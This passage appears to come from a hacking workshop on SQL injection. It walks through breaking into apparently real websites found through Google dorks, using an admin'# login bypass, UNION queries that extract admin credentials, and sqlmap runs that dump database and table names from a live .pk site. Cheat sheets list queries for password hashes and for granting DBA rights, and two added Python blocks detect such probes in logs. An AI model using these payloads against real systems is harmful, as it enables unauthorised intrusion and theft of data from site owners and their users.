the searches found in the “Vulnerable Files” section.
Web Server Detection
These links demonstrate Google's awesome ability to profile web servers.
Live Hacking
Let's use one of the above Google Hacking Database queries to hack into websites. We used the following
queries, as shown in the figure below, to find some vulnerable targets quickly.
Now we narrow our search and end up at the following portal.
Bypassing authentication by use of SQL Injections as shown below:
Accessed the admin panel.
We will be presenting more on live hacking web applications in upcoming modules.
Keep learning, keep hakin9
Module 3 – Writing SQL Injections
Introduction
In this module, we will be presenting demonstrations on how to hack into websites via SQL Injections.
This is based on live penetration testing scenarios, so don't miss this workshop!
Pre-requisites
• Sound knowledge of HTML
• Basic knowledge of any one database server
• Understanding of how SQL works
• Prior experience as a software developer is a plus
• Prior modules of this workshop should be completed first
Some Knowledge Base
Structured Query Language [SQL]: by now, you should be comfortable with SQL before you proceed
to learning how to hack the box by using SQL injections. Once you are comfortable with SQL, it is
much more convenient to execute SQL injections. Furthermore, if you are good at SQL then you already
know how to use SQL statements and the different SQL techniques needed to hack into the box.
What is SQL injection?
"SQL injection attack consists of insertion or 'injection' of a SQL query via the input data from the client
to the application." In this way you use your own SQL query to exploit another query written by the developer.
Let's give some real examples as proof of concept.
Authentication bypass – SQL Injection
In the simplest words, in this type of SQL injection you simply type a SQL fragment into an input field.
The fragment works like an injection into the pre-written SQL query that the developer runs in the
background for authentication, and bypasses it.
Live Example
In this login bypass attack, we first tried the [' OR 'a'='a] injection, but we failed. However, when
we saw that this website is built with PHP, we simply typed the PHP bypass method injection to get
access to the Administration Panel as shown in the snapshots below.
Login panel of the website to which we got access via the Google Hacking Database, as explained in the
previous module. Let's proceed.
We use the MySQL login bypass SQL injection [admin'#] to bypass the authentication: typing [#] after
[admin'] comments out the password check in the SQL query. This means the query only looks for
[admin] as the user in the database and, if found, gives us access.
This is the damage of SQL injection! By typing only [admin'#] as the SQL injection payload, we get full
access to the Admin Panel, and the website is compromised. We could proceed further by defacing the
website, but that is not within the scope of penetration testing.
Union attack – SQL injection
In this type of SQL injection attack, a UNION query is used to steal data from the database or
sometimes to bypass security controls as well. This is one of the most dangerous types of SQL
injection. Let's do it.
We have a target which is vulnerable to SQL injection; here is the evidence. We used a [ ' ] after
ID= in the URL and found the results below.
The error message confirms that this website is vulnerable to SQL injection, and we now proceed to
a UNION SQL injection. In the vulnerable URL we used the following injection query and got the
error message below.
Injection: index.asp?id=-1 union select 1 from admin
Error Message
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two
selected tables or queries of a union query do not match.
This means that the table [admin] exists in the database; we just need to match the number of columns
in our UNION query.
We kept adding one more column at every attempt until the column count matched, at which point we
got no error but the page shown below.
Injection: index.asp?id=-1 union select 1,2,3,4,5,6,7,8,9 from admin
This means that columns 3, 4 and 9 are displayed on this page, which confirms that if we can find the
column names, we can retrieve data from the database with this union attack in place of the numeric
placeholders shown. Since the table is [admin], the columns are most probably named something like
username or password. We tried this multiple times and found the two fields [user] & [pass].
Injection: index.asp?id=-1 union select 1,2,3,user,5,6,7,8,pass from admin
We got the username and password for the admin account as shown in the figure above. Website
compromised by using UNION SQL injection.
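The probing sequence above (a quote that produces a 500, a one-column UNION that errors, then UNIONs with a growing column count) is very visible in web server logs. As an added example, not from the Hakin9 article, here is a small Python detector that parses common-log-format lines, URL-decodes the query string, flags the indicators used in this module and counts how many distinct UNION column counts one client tried against a page. The log lines, IP addresses and paths are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (common log format); not from the article.
# The first four lines replay the probing sequence described above: a quote
# test, a one-column UNION that errors, then a UNION with the right count.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.asp?id=12 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.asp?id=12' HTTP/1.1" 500 321
203.0.113.7 - - [10/Oct/2023:13:55:52 +0000] "GET /index.asp?id=-1%20union%20select%201%20from%20admin HTTP/1.1" 500 410
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.asp?id=-1%20union%20select%201,2,3,4,5,6,7,8,9%20from%20admin HTTP/1.1" 200 5211
198.51.100.4 - - [10/Oct/2023:13:57:10 +0000] "GET /login.php?user=admin'%23&pass=x HTTP/1.1" 302 0
198.51.100.9 - - [10/Oct/2023:13:58:00 +0000] "GET /index.asp?id=13 HTTP/1.1" 200 5099
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Indicators, checked against the URL-decoded query string, in this order.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("sql_comment", re.compile(r"--|#|/\*")),
    ("quote_probe", re.compile(r"'")),
]


def parse_line(line):
    """Split one log line into ip, path, decoded query and status (None if
    the line is not in common log format)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "path": path,
            "query": unquote_plus(query), "status": int(m.group("status"))}


def classify(query):
    """Names of the indicators present in a decoded query string."""
    return [name for name, rx in INDICATORS if rx.search(query)]


def scan_log(text):
    """One alert per request whose query string carries an indicator. A 500
    status on such a request is tagged 'server_error': the sign, as in the
    article, that the database error reached the client."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["query"]:
            continue
        hits = classify(rec["query"])
        if not hits:
            continue
        if rec["status"] == 500:
            hits.append("server_error")
        rec["indicators"] = hits
        alerts.append(rec)
    return alerts


def union_column_counts(alerts, path):
    """Distinct column counts tried in UNION SELECTs against one path; a
    growing set is the column-matching loop walked through above."""
    counts = set()
    for a in alerts:
        if a["path"] != path or "union_select" not in a["indicators"]:
            continue
        m = re.search(r"union\s+(?:all\s+)?select\s+(.+?)\s+from\b",
                      a["query"], re.I)
        if m:
            counts.add(len(m.group(1).split(",")))
    return sorted(counts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ip"], a["path"], a["indicators"], a["query"])
    print("UNION column counts tried on /index.asp:",
          union_column_counts(found, "/index.asp"))
```

Decoding before matching matters: `%23` only becomes the `#` comment marker after `unquote_plus`, which is also why a rule that inspects raw URLs misses the login bypass line. The 500 correlation is the cheap signal to alert on first, because a quote probe that returns a database error means the page leaks enough to support the UNION step that follows.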
SQLMAP the SQL Injection Tool
So far, you have been enjoying hacking into web applications by means of manual SQL injection
techniques. Now that you have the background knowledge of how SQL injection works, let's use
SQLMAP to proceed further and extract sensitive information. SQLMAP is a Python-based tool that
executes automated SQL injection queries; it takes the burden off your head and saves time during
penetration testing. Below you can see the parameters which can be used to achieve the respective
goals with SQLMAP.
Usage: sqlmap [options]
-h, --help – Show basic help message and exit
-hh – Show advanced help message and exit
--version – Show program's version number and exit
-v VERBOSE – Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to set the target(s)
-u URL, --url=URL – Target URL (e.g. "www.target.com/vuln.php?id=1")
-g GOOGLEDORK – Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA – Data string to be sent through POST
--cookie=COOKIE – HTTP Cookie header
--random-agent – Use randomly selected HTTP User-Agent header
--proxy=PROXY – Use a proxy to connect to the target URL
--tor – Use Tor anonymity network
--check-tor – Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER – Testable parameter(s)
--dbms=DBMS – Force back-end DBMS to this value
Detection:
These options can be used to customize the detection phase
--level=LEVEL – Level of tests to perform (1-5, default 1)
--risk=RISK – Risk of tests to perform (0-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection techniques
--technique=TECH – SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements
-a, --all – Retrieve everything
-b, --banner – Retrieve DBMS banner
--current-user – Retrieve DBMS current user
--current-db – Retrieve DBMS current database
--passwords – Enumerate DBMS users password hashes
--tables – Enumerate DBMS database tables
--columns – Enumerate DBMS database table columns
--schema – Enumerate DBMS schema
--dump – Dump DBMS database table entries
--dump-all – Dump all DBMS databases tables entries
-D DB – DBMS database to enumerate
-T TBL – DBMS database table to enumerate
-C COL – DBMS database table column to enumerate
Operating system access:
These options can be used to access the back-end database management system underlying operating system
--os-shell – Prompt for an interactive operating system shell
--os-pwn – Prompt for an OOB shell, meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch – Never ask for user input, use the default behaviour
--flush-session – Flush session files for current target
Miscellaneous:
--wizard – Simple wizard interface for beginner users
We have already selected the target website; however, we will be presenting the vulnerable link only.
Website vulnerable link: tarrifDetails.aspx?id='
To confirm that this is vulnerable, we executed a UNION SQL injection attack and confirmed it as shown in
the following snapshot.
Now we will log in to Kali Linux and use SQLMAP, which comes pre-installed in Kali Linux. We will
use the vulnerable URL as the target URL and proceed to hack into the database as shown in the
snapshots below.
Finding the name of the database running in the background:
# sqlmap -u "http://www.website.com/tarrifDetails.aspx?id=1" -v 2 --current-db
We execute the above attack with SQLMAP and look at the outcome to find out the database
name in the background.
root@ralabs:~# sqlmap -u "http://www.website.com.pk/tarrifDetails.aspx?id=1" -v 2 --current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:08:06
[23:08:06] [DEBUG] cleaning up configuration parameters
[23:08:06] [DEBUG] setting the HTTP timeout
[23:08:06] [DEBUG] setting the HTTP method to GET
[23:08:06] [DEBUG] creating HTTP requests opener object
[23:08:06] [INFO] resuming back-end DBMS 'microsoft sql server'
[23:08:06] [INFO] testing connection to the target URL
[23:08:09] [INFO] heuristics detected web page charset 'windows-1252'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8834=8834 AND 'GqeT'='GqeT
Vector: AND [INFERENCE]

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1' AND 1448=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(100)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (1448=1448) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(108)+CHAR(98)+CHAR(113))) AND 'YGie'='YGie
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=1' UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(100)+CHAR(105)+CHAR(113)+CHAR(83)+CHAR(70)+CHAR(65)+CHAR(90)+CHAR(114)+CHAR(107)+CHAR(80)+CHAR(90)+CHAR(102)+CHAR(68)+CHAR(113)+CHAR(120)+CHAR(108)+CHAR(98)+CHAR(113),NULL,NULL--
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: id=1' AND 2343=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'ySAH'='ySAH
Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
---
[23:08:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[23:08:09] [INFO] fetching current database
[23:08:09] [DEBUG] performed 0 queries in 0.00 seconds
current database: '___coInnovation'
[23:08:09] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.website.com.pk'
[*] shutting down at 23:08:09
You can see that we now have the DBMS information, which we have highlighted in red; the database
name is truncated for confidentiality reasons.
Let's proceed further and find out the table names and some more leaked information. You can
play with SQLMAP on vulnerable targets very easily, and you can dump the entire contents of the
database. The command to use is shown below.
# sqlmap -u "http://www.website.com.pk/tarrifDetails.aspx?id=1" -v 2 --tables
[23:50:31] [WARNING] the SQL query provided does not return any output
Database: msdb
[9 tables]
+---------------------------------------------------+
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| suspect_pages |
+---------------------------------------------------+
Database: master
[291 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| sys.computed_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.credentials |
| sys.crypt_properties |
| sys.data_spaces |
| sys.database_files |
| sys.database_mirroring |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_db_file_space_usage |
| sys.dm_db_index_usage_stats |
| sys.dm_db_mirroring_connections |
| sys.dm_db_missing_index_details |
| sys.dm_db_missing_index_group_stats |
| sys.dm_db_missing_index_groups |
| sys.dm_db_partition_stats |
| sys.dm_db_session_space_usage |
| sys.dm_db_task_space_usage |
| sys.dm_exec_background_job_queue |
| sys.dm_exec_background_job_queue_stats |
| sys.dm_exec_cached_plans |
| sys.dm_exec_connections |
| sys.dm_exec_query_memory_grants |
| sys.dm_exec_query_optimizer_info |
| sys.dm_exec_query_resource_semaphores |
| sys.dm_exec_query_stats |
| sys.dm_exec_query_transformation_stats |
| sys.dm_exec_requests |
| sys.dm_exec_sessions |
| sys.dm_fts_active_catalogs |
| sys.dm_fts_index_population |
| sys.dm_fts_memory_buffers |
| sys.dm_fts_memory_pools |
| sys.dm_fts_population_ranges |
| sys.dm_io_backup_tapes |
| sys.dm_io_cluster_shared_drives |
| sys.dm_io_pending_io_requests |
| sys.dm_os_buffer_descriptors |
| sys.dm_os_child_instances |
| sys.dm_os_cluster_nodes |
| sys.dm_os_hosts |
| sys.dm_os_latch_stats |
| sys.dm_os_loaded_modules |
| sys.dm_os_memory_allocations |
| sys.dm_os_memory_cache_clock_hands |
| sys.dm_os_memory_cache_counters |
| sys.dm_os_memory_cache_entries |
| sys.dm_os_memory_cache_hash_tables |
| sys.dm_os_memory_clerks |
| sys.dm_os_memory_objects |
| sys.dm_os_memory_pools |
| sys.dm_os_performance_counters |
| sys.dm_os_ring_buffers |
| sys.dm_os_schedulers |
| sys.dm_os_stacks |
| sys.dm_os_sublatches |
| sys.dm_os_sys_info |
| sys.dm_os_tasks |
| sys.dm_os_threads |
| sys.dm_os_virtual_address_dump |
| sys.dm_os_wait_stats |
| sys.dm_os_waiting_tasks |
| sys.dm_os_worker_local_storage |
| sys.dm_os_workers |
| sys.dm_qn_subscriptions |
| sys.dm_repl_articles |
| sys.dm_repl_schemas |
| sys.dm_repl_tranhash |
| sys.dm_repl_traninfo |
| sys.dm_tran_active_snapshot_database_transactions |
| sys.dm_tran_active_transactions |
| sys.dm_tran_current_snapshot |
| sys.dm_tran_current_transaction |
| sys.dm_tran_database_transactions |
| sys.dm_tran_locks |
| sys.dm_tran_session_transactions |
| sys.dm_tran_top_version_generators |
| sys.dm_tran_transactions_snapshot |
| sys.dm_tran_version_store |
| sys.endpoint_webmethods |
| sys.endpoints |
| sys.event_notification_event_types |
| sys.event_notifications |
| sys.events |
| sys.extended_procedures |
| sys.extended_properties |
| sys.filegroups |
| sys.foreign_key_columns |
| sys.foreign_keys |
| sys.fulltext_catalogs |
| sys.fulltext_document_types |
| sys.fulltext_index_catalog_usages |
| sys.fulltext_index_columns |
| sys.fulltext_indexes |
| sys.fulltext_languages |
| sys.http_endpoints |
| sys.identity_columns |
| sys.index_columns |
| sys.indexes |
| sys.internal_tables |
| sys.key_constraints |
| sys.key_encryptions |
| sys.linked_logins |
| sys.login_token |
| sys.master_files |
| sys.master_key_passwords |
| sys.message_type_xml_schema_collection_usages |
| sys.messages |
| sys.module_assembly_usages |
| sys.numbered_procedure_parameters |
| sys.numbered_procedures |
| sys.objects |
| sys.openkeys |
| sys.parameter_type_usages |
| sys.parameter_xml_schema_collection_usages |
| sys.parameters |
| sys.partition_functions |
| sys.partition_parameters |
| sys.partition_range_values |
| sys.partition_schemes |
| sys.partitions |
| sys.plan_guides |
| sys.procedures |
| sys.remote_logins |
| sys.remote_service_bindings |
| sys.routes |
| sys.schemas |
| sys.securable_classes |
| sys.server_assembly_modules |
| sys.server_event_notifications |
| sys.server_events |
| sys.server_permissions |
| sys.server_principals |
| sys.server_role_members |
| sys.server_sql_modules |
| sys.server_trigger_events |
| sys.server_triggers |
| sys.servers |
| sys.service_broker_endpoints |
| sys.service_contract_message_usages |
| sys.service_contract_usages |
| sys.service_contracts |
| sys.service_message_types |
| sys.service_queue_usages |
| sys.service_queues |
| sys.services |
| sys.soap_endpoints |
| sys.sql_dependencies |
| sys.sql_logins |
| sys.sql_modules |
| sys.stats |
| sys.stats_columns |
| sys.symmetric_keys |
| sys.synonyms |
| sys.sysaltfiles |
| sys.syscacheobjects |
| sys.syscharsets |
| sys.syscolumns |
| sys.syscomments |
| sys.sysconfigures |
| sys.sysconstraints |
| sys.syscurconfigs |
| sys.syscursorcolumns |
| sys.syscursorrefs |
| sys.syscursors |
| sys.syscursortables |
| sys.sysdatabases |
| sys.sysdepends |
| sys.sysdevices |
| sys.sysfilegroups |
| sys.sysfiles |
| sys.sysforeignkeys |
| sys.sysfulltextcatalogs |
| sys.sysindexes |
| sys.sysindexkeys |
| sys.syslanguages |
| sys.syslockinfo |
| sys.syslogins |
| sys.sysmembers |
| sys.sysmessages |
| sys.sysobjects |
| sys.sysoledbusers |
| sys.sysopentapes |
| sys.sysperfinfo |
| sys.syspermissions |
| sys.sysprocesses |
| sys.sysprotects |
| sys.sysreferences |
| sys.sysremotelogins |
| sys.syssegments |
| sys.sysservers |
| sys.system_columns |
| sys.system_components_surface_area_configuration |
| sys.system_internals_allocation_units |
| sys.system_internals_partition_columns |
| sys.system_internals_partitions |
| sys.system_objects |
| sys.system_parameters |
| sys.system_sql_modules |
| sys.system_views |
| sys.systypes |
| sys.sysusers |
| sys.tables |
| sys.tcp_endpoints |
| sys.trace_categories |
| sys.trace_columns |
| sys.trace_event_bindings |
| sys.trace_events |
| sys.trace_subclass_values |
| sys.traces |
| sys.transmission_queue |
| sys.trigger_events |
| sys.triggers |
| sys.type_assembly_usages |
| sys.types |
| sys.user_token |
| sys.via_endpoints |
| sys.views |
| sys.xml_indexes |
| sys.xml_schema_attributes |
| sys.xml_schema_collections |
| sys.xml_schema_component_placements |
| sys.xml_schema_components |
| sys.xml_schema_elements |
| sys.xml_schema_facets |
| sys.xml_schema_model_groups |
| sys.xml_schema_namespaces |
| sys.xml_schema_types |
| sys.xml_schema_wildcard_namespaces |
| sys.xml_schema_wildcards |
+---------------------------------------------------+
Database: gepcoInnovation
[33 tables]
+---------------------------------------------------+
| Chall1 |
| FAQ |
| GeneralInfo |
| Logs |
| PhoneDirectory |
| Policy |
| Table_1 |
| TopManagement |
| grp |
| grp_pol |
| mytest |
| pcb_tblTariff |
| sqlmapoutput |
| tblAdmin |
| tblApplications |
| tblBOD |
| tblCategory |
| tblCsc |
| tblFeeder |
| tblGStation |
| tblID |
| tblNews |
| tblQualification |
| tblRCCshuts |
| tblRccSchedule |
| tblShuts |
| tblShuts_backup |
| tblShutss |
| tblSubDiv |
| tblTarrifWeb |
| tblUsers |
| view1 |
| view2 |
+---------------------------------------------------+
Database: __comis
[1 table]
+---------------------------------------------------+
| guest.22DATA-F-122013-TEST |
+---------------------------------------------------+
Database: gpayroll
[7 tables]
+---------------------------------------------------+
| tblDesignations |
| tblEmpDesignation |
| tbldesignations_13082012 |
| tbldesignations_16082012 |
| tblempdesignation_090812 |
| tblempdesignation_16082012 |
| tblempdesignation_18092012 |
+---------------------------------------------------+
[23:50:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 186 times
[23:50:31] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.website.com.pk'
Similarly, you can find out the columns and the entire content of the database. Imagine if you can find
credit card or email addresses with passwords!
Keep learning, keep hakin9!
Module 4 – SQL Injections in Access, MSSQL, ORACLE and MySQL Databases
Introduction
In this module, we will be presenting the techniques you can use to execute SQL injections in these
different types of databases. We will show how you can use SQL injections, and which types of
SQL injection, to hack into web applications.
Pre-requisite
Strongly recommended that you complete previous three modules.
What we will cover
So far in this workshop, we have been hacking manually as well as with SQLMAP tool. We will build
more knowledge on what type of statements you can use in SQL injections for different types of
database as there is a slight change in bit of syntax in executing SQL injections.
How to Identify Background Database Type
The best way to achieve this is to do something that can generate database errors. This is to help you
go through error messages and identify the database type. This can be achieved by using automated
tools like SQLMAP. But using just the tool is not the job of a security professional. You should know
by your own as well. We will simply present in a tabular form so that you can memorize easily.
MS Access
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'cat=' order by code'.
/index.asp, line 173

MS SQL Server
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark after the character string ''.
/Modules/Notices/ViewNoticeDetail.asp, line 36

Oracle
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC driver for Oracle][Oracle]ORA-01756: quoted string not properly terminated
/htmls/rptnewsdetail.asp, line 21

MySQL
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-5.1.63-log]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
/news/newsdetail.asp, line 190

These are the actual error messages we were getting while executing SQL injections on four different websites during a penetration test. Note that the first line only tells you the site is classic ASP talking to the database through OLE DB/ODBC; it is the bracketed driver name, or the database's own error text (ORA-xxxxx, "Unclosed quotation mark", "error in your SQL syntax"), that identifies the backend.
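The following is an added example, not code from the Hakin9 article: it turns the table above into a small classifier that pulls the identifying driver tag out of an error page and also recovers the failing ASP script and line number, which classic ASP appends to every error. The four sample messages are constructed from the table; the regular expressions and the function name are this example's own.

```python
"""Fingerprint the backend DBMS from a database error message.

Added example for this section; not code from the article. The signatures are
the driver/provider tags from the four error messages in the table above.
"""
import re
from typing import Optional, Tuple

# Ordered most specific first. "Microsoft OLE DB Provider for ODBC Drivers" is
# shared by Access, Oracle and MySQL, so only the bracketed driver tag (or the
# DBMS's own error text) discriminates between them.
DBMS_SIGNATURES = (
    ("MS Access",     re.compile(r"\[ODBC Microsoft Access Driver\]", re.I)),
    ("MS SQL Server", re.compile(r"OLE DB Provider for SQL Server|Unclosed quotation mark", re.I)),
    ("Oracle",        re.compile(r"\bORA-\d{5}\b|ODBC driver for Oracle", re.I)),
    ("MySQL",         re.compile(r"\[MySQL\]|\[mysqld-[\w.-]+\]|error in your SQL syntax", re.I)),
)

# Classic ASP appends "/path/script.asp, line N" to the error; keep it, it tells
# you which page and which line of it built the broken query.
LOCATION = re.compile(r"(/[\w./-]+\.asp\w*),\s*line\s+(\d+)", re.I)


def fingerprint(error_text: str) -> Tuple[Optional[str], Optional[str], Optional[int]]:
    """Return (dbms, script, line); each element is None when not found."""
    dbms = next((name for name, pat in DBMS_SIGNATURES if pat.search(error_text)), None)
    loc = LOCATION.search(error_text)
    script = loc.group(1) if loc else None
    line = int(loc.group(2)) if loc else None
    return dbms, script, line


# Constructed samples: the four messages from the table, as a server returns them.
SAMPLES = {
    "MS Access": (
        "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
        "[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query "
        "expression 'cat=' order by code'.\n/index.asp, line 173"
    ),
    "MS SQL Server": (
        "Microsoft OLE DB Provider for SQL Server error '80040e14'\n"
        "Unclosed quotation mark after the character string ''.\n"
        "/Modules/Notices/ViewNoticeDetail.asp, line 36"
    ),
    "Oracle": (
        "Microsoft OLE DB Provider for ODBC Drivers error '80004005'\n"
        "[Microsoft][ODBC driver for Oracle][Oracle]ORA-01756: quoted string not "
        "properly terminated\n/htmls/rptnewsdetail.asp, line 21"
    ),
    "MySQL": (
        "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
        "[MySQL][ODBC 3.51 Driver][mysqld-5.1.63-log]You have an error in your SQL "
        "syntax; check the manual that corresponds to your MySQL server version for "
        "the right syntax to use near ''' at line 1\n/news/newsdetail.asp, line 190"
    ),
}

if __name__ == "__main__":
    for expected, body in SAMPLES.items():
        print(expected, "->", fingerprint(body))
```

Treat a hit as a lead, not proof: the "Unclosed quotation mark" text is also produced by Sybase, so confirm with a database-specific query from the cheat sheets that follow (SELECT @@version, or SELECT banner FROM v$version on Oracle) before choosing your injection syntax.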
SQL Injection techniques for MySQL Database
(Each motive is followed by the injection(s) that achieve it; "-- priv" marks queries that need a privileged account.)

Version
SELECT @@version

Comments
SELECT 1; #comment
SELECT /*comment*/1;

Current User
SELECT user();
SELECT system_user();

List Users (requires privileged access)
SELECT user FROM mysql.user; -- priv

List Password Hashes
SELECT host, user, password FROM mysql.user; -- priv

Password Cracker
Use John the Ripper on the dumped hashes.

List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database
SELECT database()

List Databases
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv

List Columns
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

List Tables
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username'

Create Users
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

Delete Users
DROP USER test1; -- priv

Make User DBA
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
SQL Injection techniques for MS SQL Server

Version
SELECT @@version

Comments
SELECT 1 -- comment
SELECT /*comment*/1;
(SQL Server does not recognise # as a comment marker; use -- or /* */.)

Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List Users
SELECT name FROM master..syslogins

List Password Hashes
SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in an MSSQL error message / some versions of Query Analyzer.
